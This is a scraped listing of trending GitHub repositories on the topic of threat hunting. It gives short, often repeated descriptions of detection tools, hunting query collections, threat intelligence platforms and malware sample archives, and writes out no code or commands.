Trending repositories for topic threat-hunting
APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspi...
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case mana...
✨ A curated list of awesome threat detection and hunting resources 🕵️♂️
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
Threat Hunting query in Microsoft 365 Defender, XDR. Provide out-of-the-box KQL hunting queries - App, Email, Identity and Endpoint.
🚀🚀 This is a 🎇🔥 REAL WORLD🔥 🎇 Malware Collection I have Compiled & analysed by researchers🔥 to understand more about Malware threats😈, analysis and mitigation🧐.
APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspi...
Threat Hunting query in Microsoft 365 Defender, XDR. Provide out-of-the-box KQL hunting queries - App, Email, Identity and Endpoint.
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Bringing you the best of the worst files on the Internet.
A suite for hunting suspicious targets, expose domains and phishing discovery
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case mana...
🚀🚀 This is a 🎇🔥 REAL WORLD🔥 🎇 Malware Collection I have Compiled & analysed by researchers🔥 to understand more about Malware threats😈, analysis and mitigation🧐.
DetectionLabELK is a fork from DetectionLab with ELK stack instead of Splunk.
Scirius is a web application for Suricata ruleset management and threat hunting.
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspi...
✨ A curated list of awesome threat detection and hunting resources 🕵️♂️
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case mana...
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
Rapidly Search and Hunt through Windows Forensic Artefacts
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil.
Malwoverview is a first response tool used for threat hunting and offers intel information from Virus Total, Hybrid Analysis, URLHaus, Polyswarm, Malshare, Alien Vault, Malpedia, Malware Bazaar, Threa...
Threat Hunting query in Microsoft 365 Defender, XDR. Provide out-of-the-box KQL hunting queries - App, Email, Identity and Endpoint.
A curated list of annual cyber security reports
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspi...
Threat Hunting query in Microsoft 365 Defender, XDR. Provide out-of-the-box KQL hunting queries - App, Email, Identity and Endpoint.
A large repository of malware samples with 2500+ malware samples & source codes for a variety of platforms by Cryptware Apps.
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Bringing you the best of the worst files on the Internet.
A suite for hunting suspicious targets, expose domains and phishing discovery
A collection of PowerShell modules designed for artifact gathering and reconnaisance of Windows-based endpoints.
A repository of KQL queries focused on threat hunting and threat detecting for Microsoft Sentinel & Microsoft XDR (Former Microsoft 365 Defender).
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil.
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case mana...
✨ A curated list of awesome threat detection and hunting resources 🕵️♂️
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
A curated list of annual cyber security reports
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil.
Sysmon configuration file template with default high-quality event tracing
Rapidly Search and Hunt through Windows Forensic Artefacts
Cover various security approaches to attack techniques and also provides new discoveries about security breaches.
A repository of KQL queries focused on threat hunting and threat detecting for Microsoft Sentinel & Microsoft XDR (Former Microsoft 365 Defender).
This repository contains Open Source freely usable Threat Intel feeds that can be used without additional requirements. Contains multiple types such as IP, URL, CVE and Hash.
APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspi...
Newly registered Domain Monitoring to detect phishing and brand impersonation with subdomain enumeration and source code scraping
A curated list of annual cyber security reports
yara detection rules for hunting with the threathunting-keywords project
A suite for hunting suspicious targets, expose domains and phishing discovery
M365/Azure adversary simulation tool designed to simulate adversary techniques and generate attack telemetry.
AttacKG: Constructing Knowledge-enhanced Attack Graphs from Cyber Threat Intelligence Reports
Cover various security approaches to attack techniques and also provides new discoveries about security breaches.
A repository of KQL queries focused on threat hunting and threat detecting for Microsoft Sentinel & Microsoft XDR (Former Microsoft 365 Defender).
This repository contains Open Source freely usable Threat Intel feeds that can be used without additional requirements. Contains multiple types such as IP, URL, CVE and Hash.
Clusters and elements to attach to MISP events or attributes (like threat actors)
A large repository of malware samples with 2500+ malware samples & source codes for a variety of platforms by Cryptware Apps.
Sublime rules for email attack detection, prevention, and threat hunting.
Awesome list of keywords and artifacts for Threat Hunting sessions
A suite for hunting suspicious targets, expose domains and phishing discovery
M365/Azure adversary simulation tool designed to simulate adversary techniques and generate attack telemetry.
Collection of Remote Management Monitoring tool artifacts, for assisting forensics and investigations
yara detection rules for hunting with the threathunting-keywords project
Powershell script to help Speed up Threat hunting incident response processes
Sigma detection rules for hunting with the threathunting-keywords project
PoC showcasing new DarkGate Install Script retrieval technique via DNS TXT Record
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case mana...
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
✨ A curated list of awesome threat detection and hunting resources 🕵️♂️
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
Malwoverview is a first response tool used for threat hunting and offers intel information from Virus Total, Hybrid Analysis, URLHaus, Polyswarm, Malshare, Alien Vault, Malpedia, Malware Bazaar, Threa...
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Rapidly Search and Hunt through Windows Forensic Artefacts
Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil.
Sysmon configuration file template with default high-quality event tracing
A repository of KQL queries focused on threat hunting and threat detecting for Microsoft Sentinel & Microsoft XDR (Former Microsoft 365 Defender).
This repository contains Open Source freely usable Threat Intel feeds that can be used without additional requirements. Contains multiple types such as IP, URL, CVE and Hash.
Cover various security approaches to attack techniques and also provides new discoveries about security breaches.
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
Cover various security approaches to attack techniques and also provides new discoveries about security breaches.
A repository of KQL queries focused on threat hunting and threat detecting for Microsoft Sentinel & Microsoft XDR (Former Microsoft 365 Defender).
Awesome list of keywords and artifacts for Threat Hunting sessions
Sigma detection rules for hunting with the threathunting-keywords project
This repository contains Open Source freely usable Threat Intel feeds that can be used without additional requirements. Contains multiple types such as IP, URL, CVE and Hash.
PoC showcasing new DarkGate Install Script retrieval technique via DNS TXT Record
A curated list of annual cyber security reports
Newly registered Domain Monitoring to detect phishing and brand impersonation with subdomain enumeration and source code scraping
Tool to detect and monitor GitHub org users' public repositories for secrets and sensitive files
Threat Hunting query in Microsoft 365 Defender, XDR. Provide out-of-the-box KQL hunting queries - App, Email, Identity and Endpoint.
Microsoft 365 Advanced Hunting Queries with hotlinks that plug the query right into your tenant
Crawlector is a threat hunting framework designed for scanning websites for malicious objects.
AttacKG: Constructing Knowledge-enhanced Attack Graphs from Cyber Threat Intelligence Reports
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
pretrained BERT model for cyber security text, learned CyberSecurity Knowledge
A large repository of malware samples with 2500+ malware samples & source codes for a variety of platforms by Cryptware Apps.
Purpleteam scripts simulation & Detection - trigger events for SOC detections
This repository contains Splunk queries to hunt some anomalies